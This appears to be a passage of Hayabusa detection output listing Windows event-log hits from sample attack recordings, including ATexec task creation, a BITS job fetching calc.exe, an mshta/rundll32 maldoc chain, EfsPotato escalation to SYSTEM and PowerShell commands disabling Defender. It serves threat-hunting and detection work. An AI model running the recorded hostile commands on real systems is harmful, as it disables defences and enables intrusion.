0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,info,Evas | Persis,Bits Job Created,Job Title: test | URL: http://192.168.10.254:80/calc.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS 
Jobs/Windows-BitsClient.evtx +2021-08-08 08:32:57.348 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"" /n ""C:\Users\IEUser\Desktop\stats.doc"" | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 3424 | PGUID: 747F3D96-1829-610F-0000-0010A33FD200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | Process: C:\Windows\SysWOW64\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 9932 | PGUID: 747F3D96-182D-610F-0000-00106F40D300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? 
| LID: 0x3e5 | PID: 11196 | PGUID: 747F3D96-182D-610F-0000-00100344D300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" c:\users\public\memViewData.jpg,PluginInit | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | LID: 0x7a857 | PID: 6576 | PGUID: 747F3D96-1834-610F-0000-00105FE5D300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? 
| LID: 0x7a857 | PID: 11324 | PGUID: 747F3D96-183B-610F-0000-0010DC6CD400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-17 21:26:51.403 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.457 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: c:\temp\EfsPotato.exe whoami | Process: C:\temp\EfsPotato.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,info,,Pipe Created,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: c:\temp\EfsPotato.exe | PID: 14048 | PGUID: 
00247C92-A691-6122-0000-001021C31F02,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.881 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\temp\EfsPotato.exe whoami | LID: 0x3e7 | PID: 11328 | PGUID: 00247C92-A692-6122-0000-0010A5CD1F02,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 
04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.997 +09:00,LAPTOP-JU4M3I0E,5,info,,Process Terminated,Process: C:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 
04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p | LID: 0xbf9eb | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.303 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140_1.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=58D562E8E3496A97E0CFE34C64B7AC79F40A9367,MD5=639584D9FCDC54D7644328650028F453,SHA256=4EF85487DE3B07AB52D269A51CFC2499C2E77ECBE2C63EC556F2C59AAD311B81,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.315 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution 
- Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\UpdateRingSettings.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=50FBFD34BCB3A0CDCAE94D963AF6DA5B6EAAF702,MD5=E5783051077ECC0CF81051ACC6C7872D,SHA256=8E63CC1DDD7C554532FB00A2E3198D712ED19DD64EF6818119AFC2A5214148A8,IMPHASH=8B31BD73AB0C52BD4506C09FDABE59CE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.324 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\LoggingPlatform.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=479CD840A5352F76051B5722E4CD9004C72567EC,MD5=090BBA421A213F67FBFE10231116E008,SHA256=1E8923D71C32876B53A887983C63BC94914AB91CAAF1E13D3979F64F529DD043,IMPHASH=D39A0141F3324CB1CE047427FD20FCEA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.335 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 
00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.342 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.344 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: 
SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.350 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.355 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.513 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\OneDriveTelemetryStable.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=8D3D5F03E129C08F890847F7B12E620F9315B396,MD5=B01D2385E32F4251399C7EDCE8364967,SHA256=5E6CC575BEC320E4502B48B1050FE255BF6504013FAA6EE62A80707E3092383E,IMPHASH=C719A37B3234505BC0AADBB7DE7C9654",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.545 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileSyncTelemetryExtensions.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=B535176F0E42CE3DEE9F650070AB1CAEA840CFBF,MD5=68E4FB636BC56B74BF54F18223238862,SHA256=1084C4AF96A06F8A84CA279C659394ACB1BC80D1F5DBC16EB62964C5632C41A0,IMPHASH=D207E97F105829D9C63E79F98B136D2B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.931 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuthLib64.dll | 
Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=FFFD189CF1234EC54392F57C8D6D683A92DEB2B4,MD5=5E3A74A8E0295B1396C1A5D5D5C0664F,SHA256=E0132392E8014B120BBF51F2E98E9BB329877666A7D005353A4E96DF14DFFD4C,IMPHASH=592278570E604A14992850A5B210142D",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-10-02 02:30:39.083 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: at 13:20 /interactive cmd | Path: C:\Windows\System32\at.exe | PID: 0x15cc | User: admmig | LID: 0x65b0f5db,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Interactive shell using AT schedule task.evtx +2021-10-06 18:34:50.487 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:50.513 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableRealtimeMonitoring $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:50.787 
+09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): 